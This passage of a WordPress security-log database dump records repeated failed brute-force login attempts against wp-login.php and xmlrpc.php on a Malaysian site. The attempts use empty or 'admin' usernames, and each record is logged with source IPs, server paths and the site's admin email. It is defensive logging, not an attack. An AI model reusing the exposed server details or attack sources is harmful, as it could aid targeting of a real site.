Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.171.46\";s:11:\"REMOTE_PORT\";s:5:\"14012\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAN9mShanGhHYaqyCTcnAAAAAA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568673270.717\";s:12:\"REQUEST_TIME\";s:10:\"1568673270\";}}','notice','2019-09-16 22:34:32','2019-09-16 22:34:31',18262296,19559456,'https://bintara.com.my/xmlrpc.php',1,0,'139.59.171.46'),(24302,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.74.121.142\";s:11:\"REMOTE_PORT\";s:5:\"57080\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAPiGShanGhHYaqyCTeCwAAAA4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568673672.9024\";s:12:\"REQUEST_TIME\";s:10:\"1568673672\";}}','notice','2019-09-16 22:41:14','2019-09-16 22:41:13',17737328,19227496,'https://bintara.com.my/wp-login.php',1,0,'103.74.121.142'),(24303,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.74.121.142\";s:11:\"REMOTE_PORT\";s:5:\"57458\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAPiw99C9j9bhK9Kpk6rwAAAQ0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568673675.8356\";s:12:\"REQUEST_TIME\";s:10:\"1568673675\";}}','notice','2019-09-16 22:41:17','2019-09-16 22:41:16',18260680,19560496,'https://bintara.com.my/xmlrpc.php',1,0,'103.74.121.142'),(24304,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.248.27.238\";s:11:\"REMOTE_PORT\";s:5:\"46398\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAP3WShanGhHYaqyCTeeQAAAAE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568673757.3706\";s:12:\"REQUEST_TIME\";s:10:\"1568673757\";}}','notice','2019-09-16 22:42:38','2019-09-16 22:42:37',17740848,19231976,'https://bintara.com.my/wp-login.php',1,0,'104.248.27.238'),(24305,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.248.27.238\";s:11:\"REMOTE_PORT\";s:5:\"47156\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAP4WShanGhHYaqyCTefQAAABU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568673761.1141\";s:12:\"REQUEST_TIME\";s:10:\"1568673761\";}}','notice','2019-09-16 22:42:42','2019-09-16 22:42:41',18260632,19560496,'https://bintara.com.my/xmlrpc.php',1,0,'104.248.27.238'),(24306,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.36.222\";s:11:\"REMOTE_PORT\";s:5:\"34578\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYARlWShanGhHYaqyCTgtAAAABg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568674197.9624\";s:12:\"REQUEST_TIME\";s:10:\"1568674197\";}}','notice','2019-09-16 22:49:59','2019-09-16 22:49:58',17741640,19232192,'https://bintara.com.my/wp-login.php',1,0,'166.62.36.222'),(24307,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.36.222\";s:11:\"REMOTE_PORT\";s:5:\"35712\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYARmGShanGhHYaqyCTgugAAABM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568674200.846\";s:12:\"REQUEST_TIME\";s:10:\"1568674200\";}}','notice','2019-09-16 22:50:03','2019-09-16 22:50:01',18259688,19558056,'https://bintara.com.my/xmlrpc.php',1,0,'166.62.36.222'),(24308,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.22.194\";s:11:\"REMOTE_PORT\";s:5:\"58040\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAZch@uZ4OC5N1Fn8EoKAAAAI8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568676210.2469\";s:12:\"REQUEST_TIME\";s:10:\"1568676210\";}}','notice','2019-09-16 23:23:31','2019-09-16 23:23:30',17742256,19233136,'https://bintara.com.my/wp-login.php',1,0,'139.59.22.194'),(24309,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.22.194\";s:11:\"REMOTE_PORT\";s:5:\"58396\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAZdLIp53uPsY7BKArD1QAAAEI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568676212.4306\";s:12:\"REQUEST_TIME\";s:10:\"1568676212\";}}','notice','2019-09-16 23:23:33','2019-09-16 23:23:32',18258424,19555816,'https://bintara.com.my/xmlrpc.php',1,0,'139.59.22.194'),(24310,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 